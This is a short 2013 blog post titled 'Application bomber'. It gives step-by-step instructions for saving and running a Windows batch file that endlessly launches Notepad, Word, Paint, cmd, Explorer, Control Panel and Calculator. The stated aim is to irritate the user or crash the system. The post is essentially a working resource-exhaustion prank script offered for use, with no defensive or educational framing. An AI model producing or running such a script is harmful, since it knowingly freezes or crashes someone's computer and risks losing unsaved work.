Pages

Saturday 27 April 2013

Application bomber

Appilication bomber will open application untill the user get irritate or untill the system get crash.

so here's steps for this:-


1.
open the notepad
2.
type the following code



@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop



3.
save this file with "anyname.bat".double click on this file and see the magic.


When the above given batch program is executed, it will open up the following applications such
as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel,
and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes
or reboots.

No comments:

Post a Comment